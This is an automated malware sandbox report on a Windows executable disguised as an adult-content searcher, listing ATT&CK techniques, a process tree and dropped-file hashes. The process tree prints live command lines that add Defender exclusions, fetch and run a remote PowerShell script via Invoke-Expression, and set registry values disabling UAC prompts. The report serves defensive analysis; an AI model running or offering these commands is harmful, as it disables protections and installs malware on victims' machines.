8f244860702e6ec3d0de412de629e827bff49b641e59d71557ff3559e60c59f4

Resubmissions

20/12/2024, 07:33

241220-jds18stqej 10

02/10/2024, 12:01

241002-n6xmcavdjp 10

Analysis

max time kernel
42s
max time network
47s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
02/10/2024, 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hentai_and_Nudes_searcher.exe
Size

437KB
MD5

70e761e3048bc3b921ab2313199fd74f
SHA1

1be4deee7db5645d1e42c8e0583d3f67d5907066
SHA256

8f244860702e6ec3d0de412de629e827bff49b641e59d71557ff3559e60c59f4
SHA512

a6ca91827a3ead93b473beb380b4f757bf6140e05022a601e84362b47d46078cb14231261f6953aa5ebe7024f7fc2b8cf617b2d4f31149273da945893c85bf83
SSDEEP

12288:Jl8/sjCS8Oajo23qfmk56LBdwYPfYW7CjKmPvsnxC8fE85M16YTTKEmCj5iZSazW:EVYXKgij

Score

10^/10

discovery evasion execution persistence trojan vmprotect

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	powershell.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4628	powershell.exe
3	4628	powershell.exe
5	4628	powershell.exe
6	4628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4944	powershell.exe
1316	powershell.exe
4628	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
1164	Updates.exe
3880	nds.exe
2456	chromedrivers.exe
3224	chromedrivers.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000c00000002aa8a-102.dat	vmprotect
behavioral1/memory/1164-109-0x000002349D2D0000-0x000002349D31C000-memory.dmp	vmprotect
behavioral1/files/0x000100000002aac2-133.dat	vmprotect
behavioral1/memory/2456-140-0x0000000000A00000-0x0000000001A44000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe"	Updates.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe"	Updates.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
16	discord.com
1	discord.com
9	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ipecho.net
7	ipecho.net

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hentai_and_Nudes_searcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chromedrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chromedrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1688	wmic.exe
3220	wmic.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4944	powershell.exe
4944	powershell.exe
1316	powershell.exe
1316	powershell.exe
4628	powershell.exe
4628	powershell.exe
1164	Updates.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	1164	Updates.exe
Token: SeDebugPrivilege	4660	Hentai_and_Nudes_searcher.exe
Token: SeDebugPrivilege	3880	nds.exe
Token: SeIncreaseQuotaPrivilege	4996	wmic.exe
Token: SeSecurityPrivilege	4996	wmic.exe
Token: SeTakeOwnershipPrivilege	4996	wmic.exe
Token: SeLoadDriverPrivilege	4996	wmic.exe
Token: SeSystemProfilePrivilege	4996	wmic.exe
Token: SeSystemtimePrivilege	4996	wmic.exe
Token: SeProfSingleProcessPrivilege	4996	wmic.exe
Token: SeIncBasePriorityPrivilege	4996	wmic.exe
Token: SeCreatePagefilePrivilege	4996	wmic.exe
Token: SeBackupPrivilege	4996	wmic.exe
Token: SeRestorePrivilege	4996	wmic.exe
Token: SeShutdownPrivilege	4996	wmic.exe
Token: SeDebugPrivilege	4996	wmic.exe
Token: SeSystemEnvironmentPrivilege	4996	wmic.exe
Token: SeRemoteShutdownPrivilege	4996	wmic.exe
Token: SeUndockPrivilege	4996	wmic.exe
Token: SeManageVolumePrivilege	4996	wmic.exe
Token: 33	4996	wmic.exe
Token: 34	4996	wmic.exe
Token: 35	4996	wmic.exe
Token: 36	4996	wmic.exe
Token: SeIncreaseQuotaPrivilege	4996	wmic.exe
Token: SeSecurityPrivilege	4996	wmic.exe
Token: SeTakeOwnershipPrivilege	4996	wmic.exe
Token: SeLoadDriverPrivilege	4996	wmic.exe
Token: SeSystemProfilePrivilege	4996	wmic.exe
Token: SeSystemtimePrivilege	4996	wmic.exe
Token: SeProfSingleProcessPrivilege	4996	wmic.exe
Token: SeIncBasePriorityPrivilege	4996	wmic.exe
Token: SeCreatePagefilePrivilege	4996	wmic.exe
Token: SeBackupPrivilege	4996	wmic.exe
Token: SeRestorePrivilege	4996	wmic.exe
Token: SeShutdownPrivilege	4996	wmic.exe
Token: SeDebugPrivilege	4996	wmic.exe
Token: SeSystemEnvironmentPrivilege	4996	wmic.exe
Token: SeRemoteShutdownPrivilege	4996	wmic.exe
Token: SeUndockPrivilege	4996	wmic.exe
Token: SeManageVolumePrivilege	4996	wmic.exe
Token: 33	4996	wmic.exe
Token: 34	4996	wmic.exe
Token: 35	4996	wmic.exe
Token: 36	4996	wmic.exe
Token: SeIncreaseQuotaPrivilege	1688	wmic.exe
Token: SeSecurityPrivilege	1688	wmic.exe
Token: SeTakeOwnershipPrivilege	1688	wmic.exe
Token: SeLoadDriverPrivilege	1688	wmic.exe
Token: SeSystemProfilePrivilege	1688	wmic.exe
Token: SeSystemtimePrivilege	1688	wmic.exe
Token: SeProfSingleProcessPrivilege	1688	wmic.exe
Token: SeIncBasePriorityPrivilege	1688	wmic.exe
Token: SeCreatePagefilePrivilege	1688	wmic.exe
Token: SeBackupPrivilege	1688	wmic.exe
Token: SeRestorePrivilege	1688	wmic.exe
Token: SeShutdownPrivilege	1688	wmic.exe
Token: SeDebugPrivilege	1688	wmic.exe
Token: SeSystemEnvironmentPrivilege	1688	wmic.exe
Token: SeRemoteShutdownPrivilege	1688	wmic.exe
Token: SeUndockPrivilege	1688	wmic.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4660 wrote to memory of 1240	4660	Hentai_and_Nudes_searcher.exe	80
PID 4660 wrote to memory of 1240	4660	Hentai_and_Nudes_searcher.exe	80
PID 4660 wrote to memory of 1240	4660	Hentai_and_Nudes_searcher.exe	80
PID 1240 wrote to memory of 852	1240	net.exe	82
PID 1240 wrote to memory of 852	1240	net.exe	82
PID 1240 wrote to memory of 852	1240	net.exe	82
PID 4660 wrote to memory of 4944	4660	Hentai_and_Nudes_searcher.exe	83
PID 4660 wrote to memory of 4944	4660	Hentai_and_Nudes_searcher.exe	83
PID 4660 wrote to memory of 4944	4660	Hentai_and_Nudes_searcher.exe	83
PID 4660 wrote to memory of 1316	4660	Hentai_and_Nudes_searcher.exe	85
PID 4660 wrote to memory of 1316	4660	Hentai_and_Nudes_searcher.exe	85
PID 4660 wrote to memory of 1316	4660	Hentai_and_Nudes_searcher.exe	85
PID 4660 wrote to memory of 4628	4660	Hentai_and_Nudes_searcher.exe	87
PID 4660 wrote to memory of 4628	4660	Hentai_and_Nudes_searcher.exe	87
PID 4660 wrote to memory of 4628	4660	Hentai_and_Nudes_searcher.exe	87
PID 4628 wrote to memory of 1164	4628	powershell.exe	89
PID 4628 wrote to memory of 1164	4628	powershell.exe	89
PID 4628 wrote to memory of 3880	4628	powershell.exe	90
PID 4628 wrote to memory of 3880	4628	powershell.exe	90
PID 4628 wrote to memory of 3880	4628	powershell.exe	90
PID 1164 wrote to memory of 2456	1164	Updates.exe	91
PID 1164 wrote to memory of 2456	1164	Updates.exe	91
PID 1164 wrote to memory of 2456	1164	Updates.exe	91
PID 2456 wrote to memory of 4996	2456	chromedrivers.exe	92
PID 2456 wrote to memory of 4996	2456	chromedrivers.exe	92
PID 2456 wrote to memory of 4996	2456	chromedrivers.exe	92
PID 2456 wrote to memory of 1688	2456	chromedrivers.exe	95
PID 2456 wrote to memory of 1688	2456	chromedrivers.exe	95
PID 2456 wrote to memory of 1688	2456	chromedrivers.exe	95
PID 2456 wrote to memory of 3224	2456	chromedrivers.exe	97
PID 2456 wrote to memory of 3224	2456	chromedrivers.exe	97
PID 2456 wrote to memory of 3224	2456	chromedrivers.exe	97
PID 3224 wrote to memory of 4920	3224	chromedrivers.exe	98
PID 3224 wrote to memory of 4920	3224	chromedrivers.exe	98
PID 3224 wrote to memory of 4920	3224	chromedrivers.exe	98
PID 3224 wrote to memory of 3220	3224	chromedrivers.exe	100
PID 3224 wrote to memory of 3220	3224	chromedrivers.exe	100
PID 3224 wrote to memory of 3220	3224	chromedrivers.exe	100

C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe
"C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660
- C:\Windows\SysWOW64\net.exe
  "net" session
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    - System Location Discovery: System Language Discovery
    PID:852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"C:\Windows\System32\WindowsPowerShell\v1.0\\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression(Invoke-WebRequest -Uri \"http://pastebinlol.serv00.net/pastes/somepower14.txt\").Content"
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4628
- - C:\Users\Admin\AppData\Local\Updates.exe
    "C:\Users\Admin\AppData\Local\Updates.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Users\Admin\AppData\Local\chromedrivers.exe
      "C:\Users\Admin\AppData\Local\chromedrivers.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2456
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" csproduct get uuid
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
    - - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        System Location Discovery: System Language Discovery
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
    - - C:\Users\Admin\AppData\Local\chromedrivers.exe
        
        "C:\Users\Admin\AppData\Local\chromedrivers.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3224
      - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" csproduct get uuid
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4920
      - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        System Location Discovery: System Language Discovery
        Detects videocard installed
        
        PID:3220
- - C:\Users\Admin\AppData\Local\Temp\nds.exe
    "C:\Users\Admin\AppData\Local\Temp\nds.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2e9e5c1b0ec6b52883a21f03e6ca1b2e

SHA1
c8a911afb0a6a0dedb8e670afb2c5cea7bd666e8

SHA256
0dfa680a59128dc0b270626ea427a4e41684da075e573916f3b2670fa878a91d

SHA512
4ff62072925884305b4e3c03a57501f9038351d2b56dfca737df10ed924aa4fc2a8a07570908cf67db95ba0d6e0cdb3b45d9d8a03f036de68e1376b532654a97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9ec70c93e5ae911a9ba6cb4aaf598323

SHA1
50bce84ce7492e27395df07588b1fd94f5cc3675

SHA256
ae5e2fe13fe7b8ab738ccdafdc18409045423da2503b852cf7c1d6f23e4c6f47

SHA512
51cf96ebd7d79e6bbd6d40c4f4ac19d389e27074c947c32a889faa5773723764ac9b9e03d135af7baf87cc82ba05584bcaad4489ab070379b657aa6b26e3d4c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4oh1ddx.xta.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nds.exe

Filesize
439KB

MD5
ea3e56db72a8f96003a188e664621fae

SHA1
20e228520187983faf42c94d2a8de448c1878221

SHA256
89f59a737962ce32482dd6f733d19a780031b469b5cd21a3bddea6426258aa5f

SHA512
ad90d569c6e72528f8b18442c3edd75e9fad4110e08e5b32e4f3ef7f570e6eccf4d6e1da95e05d9323296e4e8c208ed2c08f38f9292b6477028873df1ac9bc93

Download Submit
C:\Users\Admin\AppData\Local\Updates.exe

Filesize
254KB

MD5
50df586c92d6ceb442599d20e015b357

SHA1
1d2071089bdc091d06fb1bb4e458cf7ca3dd1276

SHA256
4e435463689beff07ef6b17b8d6559d68a1f21e62bf652cc28cc6d6535da4310

SHA512
cb0dbe51fee3f15227234470c53fd61b848a7177a31929ec1b5275f9bb7528e87370433c8113f0352af62250e121e5d5e08dc15b67d9126976d5e12744c5953f

Download Submit
C:\Users\Admin\AppData\Local\chromedrivers.exe

Filesize
10.8MB

MD5
71e905772d3d65b1c93e25fd03c88235

SHA1
0edea1290d45e427cd7be43abfab11d085a5c2e3

SHA256
9526227a851d1ce70a2a444c4c7ee7de2c5bf6206a42decaad8d65c3ff0b61d9

SHA512
71af02434d64350218cec31dd13eb7baa285411d74707d29aa114033e996bfb6dc81b19eec89dd21f1103b798ded83cd089adeb690fbc48fdf62cbce3b91d924

Download Submit
memory/1164-111-0x000002349F0E0000-0x000002349F0FE000-memory.dmp

Filesize
120KB

Download
memory/1164-109-0x000002349D2D0000-0x000002349D31C000-memory.dmp

Filesize
304KB

Download
memory/1164-110-0x00000234B7810000-0x00000234B7886000-memory.dmp

Filesize
472KB

Download
memory/1316-65-0x000000006F720000-0x000000006F76C000-memory.dmp

Filesize
304KB

Download
memory/1316-63-0x0000000005CA0000-0x0000000005FF7000-memory.dmp

Filesize
3.3MB

Download
memory/2456-141-0x000000000A890000-0x000000000A942000-memory.dmp

Filesize
712KB

Download
memory/2456-140-0x0000000000A00000-0x0000000001A44000-memory.dmp

Filesize
16.3MB

Download
memory/3880-124-0x00000000003C0000-0x0000000000434000-memory.dmp

Filesize
464KB

Download
memory/4628-97-0x00000000089C0000-0x00000000089D5000-memory.dmp

Filesize
84KB

Download
memory/4628-85-0x0000000007B50000-0x0000000007B72000-memory.dmp

Filesize
136KB

Download
memory/4628-84-0x0000000008A20000-0x00000000091C6000-memory.dmp

Filesize
7.6MB

Download
memory/4628-86-0x000000006F720000-0x000000006F76C000-memory.dmp

Filesize
304KB

Download
memory/4628-95-0x0000000008780000-0x0000000008824000-memory.dmp

Filesize
656KB

Download
memory/4628-96-0x0000000008870000-0x0000000008881000-memory.dmp

Filesize
68KB

Download
memory/4660-5-0x0000000004A00000-0x0000000004A0A000-memory.dmp

Filesize
40KB

Download
memory/4660-142-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4660-25-0x00000000748FE000-0x00000000748FF000-memory.dmp

Filesize
4KB

Download
memory/4660-26-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4660-0-0x00000000748FE000-0x00000000748FF000-memory.dmp

Filesize
4KB

Download
memory/4660-125-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4660-4-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4660-3-0x0000000004A60000-0x0000000004AF2000-memory.dmp

Filesize
584KB

Download
memory/4660-2-0x0000000005010000-0x00000000055B6000-memory.dmp

Filesize
5.6MB

Download
memory/4660-1-0x0000000000010000-0x0000000000084000-memory.dmp

Filesize
464KB

Download
memory/4944-21-0x0000000005F60000-0x00000000062B7000-memory.dmp

Filesize
3.3MB

Download
memory/4944-47-0x00000000079E0000-0x00000000079EE000-memory.dmp

Filesize
56KB

Download
memory/4944-48-0x00000000079F0000-0x0000000007A05000-memory.dmp

Filesize
84KB

Download
memory/4944-49-0x0000000007B00000-0x0000000007B1A000-memory.dmp

Filesize
104KB

Download
memory/4944-50-0x0000000007AE0000-0x0000000007AE8000-memory.dmp

Filesize
32KB

Download
memory/4944-53-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-46-0x00000000079B0000-0x00000000079C1000-memory.dmp

Filesize
68KB

Download
memory/4944-45-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/4944-44-0x0000000007810000-0x000000000781A000-memory.dmp

Filesize
40KB

Download
memory/4944-43-0x00000000077A0000-0x00000000077BA000-memory.dmp

Filesize
104KB

Download
memory/4944-42-0x0000000007DE0000-0x000000000845A000-memory.dmp

Filesize
6.5MB

Download
memory/4944-39-0x0000000006A90000-0x0000000006AAE000-memory.dmp

Filesize
120KB

Download
memory/4944-41-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-40-0x0000000007460000-0x0000000007504000-memory.dmp

Filesize
656KB

Download
memory/4944-38-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-27-0x0000000006A10000-0x0000000006A44000-memory.dmp

Filesize
208KB

Download
memory/4944-28-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-29-0x000000006F720000-0x000000006F76C000-memory.dmp

Filesize
304KB

Download
memory/4944-24-0x0000000006470000-0x00000000064BC000-memory.dmp

Filesize
304KB

Download
memory/4944-23-0x0000000006450000-0x000000000646E000-memory.dmp

Filesize
120KB

Download
memory/4944-22-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-10-0x0000000005D40000-0x0000000005DA6000-memory.dmp

Filesize
408KB

Download
memory/4944-11-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/4944-12-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-9-0x00000000055A0000-0x00000000055C2000-memory.dmp

Filesize
136KB

Download
memory/4944-7-0x00000000748F0000-0x00000000750A1000-memory.dmp

Filesize
7.7MB

Download
memory/4944-8-0x00000000056A0000-0x0000000005CCA000-memory.dmp

Filesize
6.2MB

Download
memory/4944-6-0x0000000002C60000-0x0000000002C96000-memory.dmp

Filesize
216KB

Download